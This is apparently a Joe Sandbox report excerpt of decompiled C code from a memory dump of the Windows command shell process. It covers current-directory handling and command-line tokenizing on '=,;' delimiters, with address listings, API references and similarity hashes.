													_t175 =  *(_t177 - 0x24c);
													if(_t175 == 2) {
														L36:
														if(_t175 == 0 || _t175 == 1 && _t135 ==  *((intOrPtr*)(_t177 - 0x26))) {
															_t115 =  *(_t177 - 0x3c);
															if(_t115 == 0) {
																_t115 = _t177 - 0x244;
															}
															if(SetCurrentDirectoryW(_t115) == 0) {
																goto L62;
															} else {
																goto L41;
															}
														} else {
															L41:
															_t170 =  *(_t177 - 0x3c);
															if( *(_t177 - 0x3c) == 0) {
																_t170 = _t177 - 0x244;
															}
															if(E00D93A50(_t177 - 0x28, _t170) != 0) {
																E00D90DE8(_t117, _t177 - 0x244);
																_push(0xfffffffe);
																_push(_t177 - 0x10);
																_push(0xdad0b4);
																L00D982BB();
																L54:
																_push(8);
																L56:
															} else {
																_t158 =  *0xdc3cb8;
																if( *0xdc3cb8 == 0) {
																	_t158 = 0xdc3ab0;
																}
																E00D936CB(_t135, _t158,  *0xdc3cc0, 0);
																 *((intOrPtr*)(_t177 - 4)) = 0xfffffffe;
																E00D90DE8(E00D936AC(_t173), _t177 - 0x244);
															}
														}
													} else {
														_t125 =  *(_t177 - 0x3c);
														if(_t125 == 0) {
															_t125 = _t177 - 0x244;
														}
														_t126 = GetFileAttributesW(_t125);
														if(_t126 == 0xffffffff) {
															_t98 = GetLastError();
															_t175 = _t98;
															if(_t98 == 2) {
																_t175 = 3;
															}
															L64:
															E00D90DE8(_t98, _t177 - 0x244);
															_push(0xfffffffe);
															_push(_t177 - 0x10);
															_push(0xdad0b4);
															L00D982BB();
														} else {
															if((_t126 & 0x00000410) == 0) {
																E00D90DE8(_t126, _t177 - 0x244);
																_push(0xfffffffe);
																_push(_t177 - 0x10);
																_push(0xdad0b4);
																L00D982BB();
															} else {
																goto L36;
															}
														}
													}
												} else {
													_t161 =  *(_t177 - 0x3c);
													if( *(_t177 - 0x3c) == 0) {
														_t161 = _t177 - 0x244;
													}
													if(E00D9245C(_t161,  *(_t177 - 0x34), 0) == 0) {
														goto L65;
													} else {
														goto L32;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return E00D97614(_t135, _t173, _t175);
			}

0x00d933fc
0x00d933fc
0x00d933fc
0x00d93401
0x00d93406
0x00d9340b
0x00d93411
0x00d93415
0x00d93419
0x00d9dc11
0x00000000
0x00d9dc17
0x00d9dc17
0x00d9341f
0x00d9341f
0x00d93425
0x00d9344b
0x00d9dc21
0x00d9dc27
0x00000000
0x00d93451
0x00d93458
0x00d9345a
0x00d93462
0x00000000
0x00d93468
0x00d9346a
0x00d9346d
0x00d9346f
0x00d9346f
0x00d93472
0x00d93472
0x00d93475
0x00d93478
0x00d93481
0x00d93484
0x00d93486
0x00d93486
0x00d9348e
0x00000000
0x00000000
0x00d93490
0x00d93490
0x00d93497
0x00d9dc76
0x00000000
0x00d9dc76
0x00000000
0x00d93497
0x00d9349f
0x00d934a2
0x00d934a7
0x00d9dc7d
0x00d9dc7d
0x00d934b1
0x00d934b7
0x00d934bc
0x00d9dc88
0x00d9dc88
0x00d934cd
0x00d934d2
0x00d934d3
0x00d934db
0x00d934e4
0x00d934e7
0x00d9dc93
0x00d934f7
0x00d93502
0x00d93502
0x00d93506
0x00d9350c
0x00d93510
0x00d93515
0x00d9dc9c
0x00d9dc9c
0x00d93527
0x00d9352f
0x00d9dca7
0x00d9dcad
0x00000000
0x00d93535
0x00d93538
0x00d9dcd9
0x00d9dcdf
0x00d9dce4
0x00d9dce9
0x00d9dcea
0x00d9dcef
0x00d9353e
0x00d9353e
0x00d93543
0x00d93545
0x00d9dd01
0x00d9dd01
0x00d93550
0x00d9dc50
0x00d9dc56
0x00d9dc5b
0x00d9dc60
0x00d9dc61
0x00d9dc66
0x00d9dc6e
0x00000000
0x00d93556
0x00d9355a
0x00d9dd0c
0x00d9dd0c
0x00d93564
0x00000000
0x00d9356a
0x00d9356c
0x00d9356e
0x00d9dd17
0x00d9dd17
0x00d93574
0x00d93577
0x00d93577
0x00d9357a
0x00d9357d
0x00d93585
0x00d93589
0x00d9dd22
0x00d9dd22
0x00d9358f
0x00d93592
0x00d93592
0x00d93594
0x00d935aa
0x00000000
0x00000000
0x00d935ae
0x00d935b3
0x00d936a4
0x00000000
0x00d936a4
0x00000000
0x00d935b3
0x00d935bb
0x00d935be
0x00d935c3
0x00d9dd2d
0x00d9dd2d
0x00d935d3
0x00d9dd3e
0x00d9dd43
0x00000000
0x00d9dd52
0x00d9dd55
0x00000000
0x00d9dd5b
0x00000000
0x00d9dd5b
0x00d9dd55
0x00d935d9
0x00d935d9
0x00d935e0
0x00d93600
0x00d93600
0x00d93609
0x00d93631
0x00d93633
0x00d93640
0x00d93645
0x00d936b4
0x00d936b4
0x00d93650
0x00000000
0x00000000
0x00000000
0x00000000
0x00d93656
0x00d93656
0x00d93656
0x00d9365b
0x00d936bc
0x00d936bc
0x00d93667
0x00d9dc34
0x00d9dc39
0x00d9dc3e
0x00d9dc3f
0x00d9dc44
0x00d9dc4c
0x00d9dc4c
0x00d9dc70
0x00d9366d
0x00d9366d
0x00d93675
0x00d936c4
0x00d936c4
0x00d93680
0x00d93685
0x00d93697
0x00d9369c
0x00d93667
0x00d9360b
0x00d9360b
0x00d93610
0x00d9dd6b
0x00d9dd6b
0x00d93617
0x00d93620
0x00d9dd76
0x00d9dd7c
0x00d9dd81
0x00d9dcb3
0x00d9dcb3
0x00d9dcb4
0x00d9dcba
0x00d9dcbf
0x00d9dcc4
0x00d9dcc5
0x00d9dcca
0x00d93626
0x00d9362b
0x00d9dd92
0x00d9dd97
0x00d9dd9c
0x00d9dd9d
0x00d9dda2
0x00000000
0x00000000
0x00000000
0x00d9362b
0x00d93620
0x00d935e2
0x00d935e2
0x00d935e7
0x00d9dd60
0x00d9dd60
0x00d935fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00d935fa
0x00d935e0
0x00d935d3
0x00d93564
0x00d93550
0x00d93538
0x00d9352f
0x00d93462
0x00d9344b
0x00d936a3

APIs

Part of subcall function 00D90D51: memset.MSVCRT ref: 00D90D7D

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000,?,?,?,?,?), ref: 00D934B1
towupper.MSVCRT ref: 00D934C6
iswalpha.MSVCRT ref: 00D934DB
towupper.MSVCRT ref: 00D934FB
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 00D93527
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D935CA
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D93617
SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 00D93648
_local_unwind4.MSVCRT ref: 00D9DC44
_local_unwind4.MSVCRT ref: 00D9DC66

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: AttributesCurrentDirectoryFile_local_unwind4memsettowupper$FullNamePathiswalpha
String ID:
API String ID: 2497804757-0
Opcode ID: d383f62e974fc989514047c84c6a713dfaf0c8f377f7020b7b09b73fe4615f6b
Instruction ID: 345c99500ce153bc25ab5d735c3e36ce3375af2f5d5df0058cf26c8c90c5d194
Opcode Fuzzy Hash: d383f62e974fc989514047c84c6a713dfaf0c8f377f7020b7b09b73fe4615f6b
Instruction Fuzzy Hash: D9B1B031A042169ACF28EB64DD59AFDB376EF48300F594169E45AE3290EB70DF84DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D8EA40, Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 413
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00D8EA40(signed short* __ecx, wchar_t* __edx, signed int _a4) {
				long _v8;
				signed int _v12;
				long _v16;
				wchar_t* _v20;
				long _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				long _v236;
				char* _v260;
				char _v264;
				wchar_t* _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				signed int _t79;
				signed short _t81;
				signed int _t82;
				long _t83;
				wchar_t* _t85;
				signed char _t86;
				signed int _t87;
				int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				long _t94;
				signed int _t96;
				signed int _t104;
				signed int _t105;
				void* _t108;
				signed int _t109;
				signed int _t110;
				signed int* _t113;
				signed int _t114;
				signed int _t115;
				long _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				wchar_t* _t126;
				intOrPtr _t127;
				signed int _t128;
				signed int _t129;
				void* _t130;
				long _t134;
				wchar_t* _t135;
				wchar_t* _t136;
				signed int* _t137;
				intOrPtr* _t138;
				signed short* _t143;
				long _t144;
				long _t145;
				signed int _t150;
				signed int _t158;
				signed int _t159;
				long _t160;
				long _t164;
				void* _t169;
				signed int _t172;
				long _t173;
				signed int _t177;
				void* _t179;
				signed int _t180;
				signed int _t183;
				signed short* _t185;
				signed short* _t186;
				long _t187;
				signed int* _t188;
				signed int _t190;
				signed int _t191;
				void* _t193;

				_t167 = __edx;
				_t138 = __ecx;
				_t73 =  *0xdad0b4; // 0x35c4fbb8
				_v12 = _t73 ^ _t191;
				_t186 = __ecx;
				_t136 = __edx;
				if(__ecx == 0) {
					_t139 = 4;
					_t75 = E00D900B0(4);
					__eflags = _t75;
					if(_t75 != 0) {
						goto L23;
					} else {
						E00DA9287(4);
						__imp__longjmp(0xdbb8b8, 1);
						goto L95;
					}
				} else {
					_t2 = _t138 + 2; // 0x2
					_t179 = _t2;
					do {
						_t127 =  *_t138;
						_t138 = _t138 + 2;
					} while (_t127 != 0);
					_t139 = 4 + (_t138 - _t179 >> 1) * 4;
					_t128 = E00D900B0(4 + (_t138 - _t179 >> 1) * 4);
					_v236 = _t128;
					if(_t128 == 0) {
						L95:
						E00DA9287(_t139);
						__imp__longjmp(0xdbb8b8, 1);
						goto L96;
					} else {
						_v228 = _t128;
						_t185 = L"=,;";
						_t129 = 0;
						_v220 = 0;
						while(1) {
							_t164 =  *_t185 & 0x0000ffff;
							_v224 = _t164;
							if(_t164 == 0) {
								break;
							}
							if(_t136 == 0) {
								L9:
								 *(_t191 + _t129 * 2 - 0xd4) = _t164;
								_t129 = _t129 + 1;
								_v220 = _t129;
							} else {
								_t135 = wcschr(_t136, _t164);
								_t193 = _t193 + 8;
								_t129 = _v220;
								if(_t135 == 0) {
									_t164 = _v224;
									goto L9;
								}
							}
							_t185 =  &(_t185[1]);
							if(_t129 < 0x63) {
								continue;
							}
							break;
						}
						_t183 = _v228;
						_t130 = _t129 + _t129;
						if(_t130 >= 0xc8) {
							E00D9711D(_t130, _t136, _t164, _t179, _t183, _t186);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t191);
							_push(_t136);
							_push(_t186);
							_v264 = 0;
							_push(_t183);
							__eflags = 0;
							_v260 =  &_v264;
							_t136 = E00D8E9A0(0, 0);
							_v268 = _t136;
							goto L62;
						} else {
							_v224 = 1;
							 *((short*)(_t191 + _t130 - 0xd4)) = 0;
							_t134 =  *_t186 & 0x0000ffff;
							_v220 = 1;
							if(_t134 != 0) {
								_t144 = _t134;
								L14:
								if(_t144 == 0x22) {
									L17:
									_v224 = 0;
									if(_t136 == 0) {
										L19:
										 *_t180 =  *_t186;
										_t180 = _t180 + 2;
										if( *_t186 == 0x22) {
											while(1) {
												_t81 = _t186[1];
												_t143 = _t186;
												_t186 =  &(_t186[1]);
												 *_t180 = _t81;
												_t180 = _t180 + 2;
												_t82 =  *_t186 & 0x0000ffff;
												__eflags = _t82;
												if(_t82 == 0) {
													break;
												}
												__eflags = _t82 - 0x22;
												if(_t82 == 0x22) {
													goto L20;
												} else {
													__eflags = _t186[1];
													if(_t186[1] != 0) {
														continue;
													} else {
														goto L20;
													}
												}
												goto L22;
											}
											_t186 = _t143;
										}
										L20:
										_v220 = 0;
									} else {
										_t85 = wcschr(_t136,  *_t186 & 0x0000ffff);
										_t193 = _t193 + 8;
										if(_t85 != 0) {
											_t86 = _a4;
											__eflags = _t86 & 0x00000002;
											if((_t86 & 0x00000002) != 0) {
												__eflags = _v220;
												_t87 =  *_t186 & 0x0000ffff;
												if(_v220 == 0) {
													_t180 = _t180 + 2;
												}
												 *_t180 = _t87;
												_v220 = 1;
												_t180 = _t180 + 4;
											} else {
												__eflags = _t86 & 0x00000004;
												if((_t86 & 0x00000004) != 0) {
													 *_t180 =  *_t186;
												}
												_v220 = 0;
												_t180 = _t180 + 2;
											}
										} else {
											goto L19;
										}
									}
									_t83 = _t186[1] & 0x0000ffff;
									_t186 =  &(_t186[1]);
									_t144 = _t83;
									if(_t83 != 0) {
										goto L14;
									}
								} else {
									_t89 = iswspace(_t144);
									_t193 = _t193 + 4;
									if(_t89 != 0) {
										L24:
										_t90 = _a4;
										__eflags = _t90 & 0x00000001;
										if((_t90 & 0x00000001) != 0) {
											__eflags = _v224;
											if(_v224 == 0) {
												goto L17;
											} else {
												goto L25;
											}
										} else {
											L25:
											_t91 = _t90 & 0x00000002;
											__eflags = _t91;
											_v228 = _t91;
											if(_t91 == 0) {
												L28:
												_t93 = _a4 & 0x00000004;
												__eflags = _t93;
												_v232 = _t93;
												if(_t93 != 0) {
													L96:
													_t79 = E00D8D7D4(_t136,  *_t186);
													__eflags = _t79;
													if(_t79 != 0) {
														goto L17;
													} else {
														goto L29;
													}
												} else {
													L29:
													_t94 =  *_t186 & 0x0000ffff;
													__eflags = _t94;
													if(_t94 != 0) {
														_t160 = _t94;
														while(1) {
															__eflags = _t160 - 0x22;
															if(_t160 == 0x22) {
																break;
															}
															_t114 = iswspace(_t160);
															_t193 = _t193 + 4;
															__eflags = _t114;
															if(_t114 != 0) {
																L39:
																__eflags = _v228;
																if(_v228 == 0) {
																	L42:
																	__eflags = _v232;
																	if(_v232 != 0) {
																		_t115 = E00D8D7D4(_t136,  *_t186);
																		__eflags = _t115;
																		if(_t115 != 0) {
																			break;
																		} else {
																			goto L43;
																		}
																	} else {
																		L43:
																		_t116 = _t186[1] & 0x0000ffff;
																		_t186 =  &(_t186[1]);
																		_t160 = _t116;
																		__eflags = _t116;
																		if(_t116 != 0) {
																			continue;
																		} else {
																		}
																	}
																} else {
																	__eflags = _t136;
																	if(_t136 == 0) {
																		goto L42;
																	} else {
																		_t118 = wcschr(_t136,  *_t186 & 0x0000ffff);
																		_t193 = _t193 + 8;
																		__eflags = _t118;
																		if(_t118 != 0) {
																			break;
																		} else {
																			goto L42;
																		}
																	}
																}
															} else {
																_t121 = wcschr( &_v216,  *_t186 & 0x0000ffff);
																_t193 = _t193 + 8;
																__eflags = _t121;
																if(_t121 != 0) {
																	goto L39;
																} else {
																	break;
																}
															}
															goto L22;
														}
														__eflags =  *_t186;
														if( *_t186 != 0) {
															__eflags = _v224;
															if(_v224 == 0) {
																__eflags = _v220;
																if(_v220 == 0) {
																	_t180 = _t180 + 2;
																	__eflags = _t180;
																}
															}
															_v220 = 1;
															goto L17;
														}
													}
												}
											} else {
												__eflags = _t136;
												if(_t136 == 0) {
													goto L28;
												} else {
													_t123 = wcschr(_t136,  *_t186 & 0x0000ffff);
													_t193 = _t193 + 8;
													__eflags = _t123;
													if(_t123 != 0) {
														goto L17;
													} else {
														goto L28;
													}
												}
											}
										}
									} else {
										_t126 = wcschr( &_v216,  *_t186 & 0x0000ffff);
										_t193 = _t193 + 8;
										if(_t126 != 0) {
											goto L24;
										} else {
											goto L17;
										}
									}
								}
							}
							L22:
							_t145 = _v236;
							_t180 = _t180 - _t145 >> 1;
							_t167 = 4 + _t180 * 2;
							if(E00D90100(_t145, 4 + _t180 * 2) == 0) {
								E00DA9287(_t145);
								__imp__longjmp(0xdbb8b8, 1);
								asm("int3");
								L102:
								_t169 = _t145 + 2;
								do {
									_t96 =  *_t145;
									_t145 = _t145 + 2;
									__eflags = _t96;
								} while (_t96 != 0);
								_t183 = _t180 + (_t145 - _t169 >> 1);
								L68:
								_t148 = _t183 + _t183;
								_t187 = E00D900B0(_t183 + _t183);
								_v8 = _t187;
								__eflags = _t187;
								if(_t187 == 0) {
									E00DA9287(_t148);
									__imp__longjmp(0xdbb8b8, 1);
									asm("int3");
									__eflags =  *0xdbfa90;
									if( *0xdbfa90 != 0) {
										E00DA82EB(_t148);
									}
									__eflags = 0;
									__eflags =  *0xdbfa88;
									 *0xdad5c8 = 0;
									if( *0xdbfa88 != 0) {
										E00DA8121(_t187, 0);
									}
									return _t187;
								}
								_t150 = _t136[0xf];
								__eflags = _t150;
								if(_t150 != 0) {
									E00D91040(_t187, _t183, _t150);
								}
								_t104 = 0;
								__eflags = _t183;
								if(_t183 == 0) {
									L106:
									_t104 = 0x80070057;
								} else {
									__eflags = _t183 - 0x7fffffff;
									if(_t183 > 0x7fffffff) {
										goto L106;
									}
								}
								__eflags = _t104;
								if(_t104 < 0) {
									L109:
									_t172 = 0;
								} else {
									_t104 = 0;
									_t159 = _t183;
									_t173 = _t187;
									__eflags = _t183;
									if(_t183 == 0) {
										L108:
										_t104 = 0x80070057;
										goto L109;
									} else {
										while(1) {
											__eflags =  *_t173 - _t104;
											if( *_t173 == _t104) {
												break;
											}
											_t173 = _t173 + 2;
											_t159 = _t159 - 1;
											__eflags = _t159;
											if(_t159 != 0) {
												continue;
											} else {
												goto L108;
											}
											goto L114;
										}
										__eflags = _t159;
										if(_t159 == 0) {
											goto L108;
										} else {
											_t172 = _t183 - _t159;
											__eflags = _t172;
										}
									}
								}
								__eflags = _t104;
								if(_t104 >= 0) {
									_t113 = _v8 + _t172 * 2;
									_t190 = _t183 - _t172;
									__eflags = _t190;
									if(_t190 == 0) {
										L83:
										_t113 = _t113 - 2;
									} else {
										_t177 = _t172 + 0x7ffffffe + _t190 - _t183;
										_t183 = 0xdbfaa0 - _t113;
										__eflags = 0xdbfaa0;
										while(1) {
											__eflags = _t177;
											if(_t177 == 0) {
												break;
											}
											_t158 =  *(_t113 + _t183) & 0x0000ffff;
											__eflags = _t158;
											if(_t158 == 0) {
												break;
											} else {
												 *_t113 = _t158;
												_t177 = _t177 - 1;
												_t113 =  &(_t113[0]);
												_t190 = _t190 - 1;
												__eflags = _t190;
												if(_t190 != 0) {
													continue;
												} else {
													goto L83;
												}
											}
											goto L85;
										}
										__eflags = _t190;
										if(_t190 == 0) {
											goto L83;
										}
									}
									L85:
									_t187 = _v8;
									__eflags = 0;
									 *_t113 = 0;
								}
								_t136[0xf] = _t187;
								while(1) {
									L62:
									_t105 = E00D8EEC8();
									__eflags = _t105;
									if(_t105 == 0) {
										break;
									}
									_t108 = E00D8F030(1);
									__eflags = _t108 - 0x4000;
									if(_t108 == 0x4000) {
										_t145 = _t136[0xf];
										_t180 =  *0xdbfa8c;
										__eflags = _t145;
										if(_t145 != 0) {
											goto L102;
										}
										goto L68;
									} else {
										_t188 = _v12;
										_t109 = E00D902B0(_t136, _t188, _t183, _t188);
										__eflags = _t109;
										if(_t109 != 0) {
											_t110 =  *_t188;
											do {
												_t69 = _t110 + 0x14; // 0x14
												_t137 = _t69;
												_t110 =  *_t137;
												_v12 = _t137;
												__eflags = _t110;
											} while (_t110 != 0);
											_t136 = _v20;
											continue;
										} else {
											__eflags = 0;
											E00D8F300(_t109, 0, 0, _t109);
										}
									}
									break;
								}
								_t136[0xd] = _v16;
								return _t136;
							} else {
								L23:
								return E00D96FD0(_t75, _t136, _v12 ^ _t191, _t167, _t180, _t186);
							}
						}
					}
				}
				goto L114;
			}

0x00d8ea40
0x00d8ea40
0x00d8ea4b
0x00d8ea52
0x00d8ea57
0x00d8ea59
0x00d8ea5e
0x00d8ed52
0x00d8ed57
0x00d8ed5c
0x00d8ed5e
0x00000000
0x00d8ed64
0x00d9c03d
0x00d9c049
0x00000000
0x00d9c049
0x00d8ea64
0x00d8ea64
0x00d8ea64
0x00d8ea67
0x00d8ea67
0x00d8ea6a
0x00d8ea6d
0x00d8ea76
0x00d8ea7d
0x00d8ea82
0x00d8ea8a
0x00d9c04f
0x00d9c04f
0x00d9c05b
0x00000000
0x00d8ea90
0x00d8ea90
0x00d8ea96
0x00d8ea9b
0x00d8ea9d
0x00d8eaa3
0x00d8eaa3
0x00d8eaa6
0x00d8eaaf
0x00000000
0x00000000
0x00d8eab3
0x00d8ead0
0x00d8ead0
0x00d8ead8
0x00d8ead9
0x00d8eab5
0x00d8eab7
0x00d8eabd
0x00d8eac2
0x00d8eac8
0x00d8eaca
0x00000000
0x00d8eaca
0x00d8eac8
0x00d8eadf
0x00d8eae5
0x00000000
0x00000000
0x00000000
0x00d8eae5
0x00d8eae7
0x00d8eaed
0x00d8eaf4
0x00d8ed75
0x00d8ed7a
0x00d8ed7b
0x00d8ed7c
0x00d8ed7d
0x00d8ed7e
0x00d8ed7f
0x00d8ed82
0x00d8ed88
0x00d8ed89
0x00d8ed8d
0x00d8ed94
0x00d8ed95
0x00d8ed97
0x00d8ed9f
0x00d8eda1
0x00000000
0x00d8eafa
0x00d8eafc
0x00d8eb06
0x00d8eb0e
0x00d8eb11
0x00d8eb1e
0x00d8eb24
0x00d8eb26
0x00d8eb2a
0x00d8eb5a
0x00d8eb5a
0x00d8eb66
0x00d8eb7e
0x00d8eb81
0x00d8eb84
0x00d8eb8b
0x00d8ecf0
0x00d8ecf0
0x00d8ecf4
0x00d8ecf6
0x00d8ecf9
0x00d8ecfc
0x00d8ecff
0x00d8ed02
0x00d8ed05
0x00000000
0x00000000
0x00d8ed07
0x00d8ed0a
0x00000000
0x00d8ed10
0x00d8ed10
0x00d8ed15
0x00000000
0x00d8ed17
0x00000000
0x00d8ed17
0x00d8ed15
0x00000000
0x00d8ed0a
0x00d8ed6e
0x00d8ed6e
0x00d8eb91
0x00d8eb91
0x00d8eb68
0x00d8eb6d
0x00d8eb73
0x00d8eb78
0x00d8eccd
0x00d8ecd0
0x00d8ecd2
0x00d8ed1c
0x00d8ed23
0x00d8ed26
0x00d8ed69
0x00d8ed69
0x00d8ed28
0x00d8ed2e
0x00d8ed38
0x00d8ecd4
0x00d8ecd4
0x00d8ecd6
0x00d9c092
0x00d9c092
0x00d8ecdc
0x00d8ece6
0x00d8ece6
0x00000000
0x00000000
0x00000000
0x00d8eb78
0x00d8eb9b
0x00d8eb9f
0x00d8eba2
0x00d8eba7
0x00000000
0x00000000
0x00d8eb2c
0x00d8eb2d
0x00d8eb33
0x00d8eb38
0x00d8ebde
0x00d8ebde
0x00d8ebe1
0x00d8ebe3
0x00d8ed40
0x00d8ed47
0x00000000
0x00d8ed4d
0x00000000
0x00d8ed4d
0x00d8ebe9
0x00d8ebe9
0x00d8ebe9
0x00d8ebe9
0x00d8ebec
0x00d8ebf2
0x00d8ec0e
0x00d8ec11
0x00d8ec11
0x00d8ec14
0x00d8ec1a
0x00d9c061
0x00d9c066
0x00d9c06b
0x00d9c06d
0x00000000
0x00d9c073
0x00000000
0x00d9c073
0x00d8ec20
0x00d8ec20
0x00d8ec20
0x00d8ec23
0x00d8ec26
0x00d8ec28
0x00d8ec30
0x00d8ec30
0x00d8ec34
0x00000000
0x00000000
0x00d8ec37
0x00d8ec3d
0x00d8ec40
0x00d8ec42
0x00d8ec8a
0x00d8ec8a
0x00d8ec91
0x00d8eca9
0x00d8eca9
0x00d8ecb0
0x00d9c07d
0x00d9c082
0x00d9c084
0x00000000
0x00d9c08a
0x00000000
0x00d9c08a
0x00d8ecb6
0x00d8ecb6
0x00d8ecb6
0x00d8ecba
0x00d8ecbd
0x00d8ecbf
0x00d8ecc2
0x00000000
0x00000000
0x00d8ecc8
0x00d8ecc2
0x00d8ec93
0x00d8ec93
0x00d8ec95
0x00000000
0x00d8ec97
0x00d8ec9c
0x00d8eca2
0x00d8eca5
0x00d8eca7
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8eca7
0x00d8ec95
0x00d8ec44
0x00d8ec4f
0x00d8ec55
0x00d8ec58
0x00d8ec5a
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8ec5a
0x00000000
0x00d8ec42
0x00d8ec5c
0x00d8ec60
0x00d8ec66
0x00d8ec6d
0x00d8ec6f
0x00d8ec76
0x00d8ec78
0x00d8ec78
0x00d8ec78
0x00d8ec76
0x00d8ec7b
0x00000000
0x00d8ec7b
0x00d8ec60
0x00d8ec26
0x00d8ebf4
0x00d8ebf4
0x00d8ebf6
0x00000000
0x00d8ebf8
0x00d8ebfd
0x00d8ec03
0x00d8ec06
0x00d8ec08
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8ec08
0x00d8ebf6
0x00d8ebf2
0x00d8eb3e
0x00d8eb49
0x00d8eb4f
0x00d8eb54
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8eb54
0x00d8eb38
0x00d8eb2a
0x00d8ebad
0x00d8ebad
0x00d8ebb5
0x00d8ebb7
0x00d8ebc5
0x00d9c09a
0x00d9c0a6
0x00d9c0ac
0x00d9c0ad
0x00d9c0ad
0x00d9c0b0
0x00d9c0b0
0x00d9c0b3
0x00d9c0b6
0x00d9c0b6
0x00d9c0bf
0x00d8edfa
0x00d8edfa
0x00d8ee02
0x00d8ee04
0x00d8ee07
0x00d8ee09
0x00d9c0f7
0x00d9c103
0x00d9c109
0x00d9c10a
0x00d9c111
0x00d9c117
0x00d9c117
0x00d8efe1
0x00d8efe3
0x00d8efea
0x00d8efef
0x00d9c125
0x00d9c125
0x00000000
0x00d8eff5
0x00d8ee0f
0x00d8ee12
0x00d8ee14
0x00d9c0cb
0x00d9c0cb
0x00d8ee1a
0x00d8ee1c
0x00d8ee1e
0x00d9c0d5
0x00d9c0d5
0x00d8ee24
0x00d8ee24
0x00d8ee2a
0x00000000
0x00000000
0x00d8ee2a
0x00d8ee30
0x00d8ee32
0x00d9c0f0
0x00d9c0f0
0x00d8ee38
0x00d8ee38
0x00d8ee3a
0x00d8ee3c
0x00d8ee3e
0x00d8ee40
0x00d9c0eb
0x00d9c0eb
0x00000000
0x00d8ee46
0x00d8ee46
0x00d8ee46
0x00d8ee49
0x00000000
0x00000000
0x00d9c0df
0x00d9c0e2
0x00d9c0e2
0x00d9c0e5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d9c0e5
0x00d8ee4f
0x00d8ee51
0x00000000
0x00d8ee57
0x00d8ee59
0x00d8ee59
0x00d8ee59
0x00d8ee51
0x00d8ee40
0x00d8ee5b
0x00d8ee5d
0x00d8ee64
0x00d8ee67
0x00d8ee67
0x00d8ee69
0x00d8ee99
0x00d8ee99
0x00d8ee6b
0x00d8ee7a
0x00d8ee7c
0x00d8ee7c
0x00d8ee80
0x00d8ee80
0x00d8ee82
0x00000000
0x00000000
0x00d8ee84
0x00d8ee88
0x00d8ee8b
0x00000000
0x00d8ee8d
0x00d8ee8d
0x00d8ee90
0x00d8ee91
0x00d8ee94
0x00d8ee94
0x00d8ee97
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8ee97
0x00000000
0x00d8ee8b
0x00d8ee9e
0x00d8eea0
0x00000000
0x00000000
0x00d8eea0
0x00d8eea2
0x00d8eea2
0x00d8eea5
0x00d8eea7
0x00d8eea7
0x00d8eeaa
0x00d8eda4
0x00d8eda4
0x00d8eda4
0x00d8eda9
0x00d8edab
0x00000000
0x00000000
0x00d8edb2
0x00d8edb7
0x00d8edbc
0x00d8ede9
0x00d8edec
0x00d8edf2
0x00d8edf4
0x00000000
0x00000000
0x00000000
0x00d8edbe
0x00d8edbe
0x00d8edc3
0x00d8edc8
0x00d8edca
0x00d8eeb2
0x00d8eeb4
0x00d8eeb4
0x00d8eeb4
0x00d8eeb7
0x00d8eeb9
0x00d8eebc
0x00d8eebc
0x00d8eec0
0x00000000
0x00d8edd0
0x00d8edd3
0x00d8edd5
0x00d8edd5
0x00d8edca
0x00000000
0x00d8edbc
0x00d8edde
0x00d8ede8
0x00d8ebcb
0x00d8ebcb
0x00d8ebdb
0x00d8ebdb
0x00d8ebc5
0x00d8eaf4
0x00d8ea8a
0x00000000

APIs

wcschr.MSVCRT ref: 00D8EAB7
iswspace.MSVCRT ref: 00D8EB2D
wcschr.MSVCRT ref: 00D8EB49
wcschr.MSVCRT ref: 00D8EB6D
wcschr.MSVCRT ref: 00D8EBFD
iswspace.MSVCRT ref: 00D8EC37
wcschr.MSVCRT ref: 00D8EC4F
wcschr.MSVCRT ref: 00D8EC9C
longjmp.MSVCRT(00DBB8B8,00000001,00000000,?,?), ref: 00D9C049
longjmp.MSVCRT(00DBB8B8,00000001), ref: 00D9C05B

Strings

=,;, xrefs: 00D8EA96

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: wcschr$iswspacelongjmp
String ID: =,;
API String ID: 4008636219-1539845467
Opcode ID: f3e488ecfb93dd3aec5c1f403c4c2199c608edd3db6a0fa905976274b6d2d929
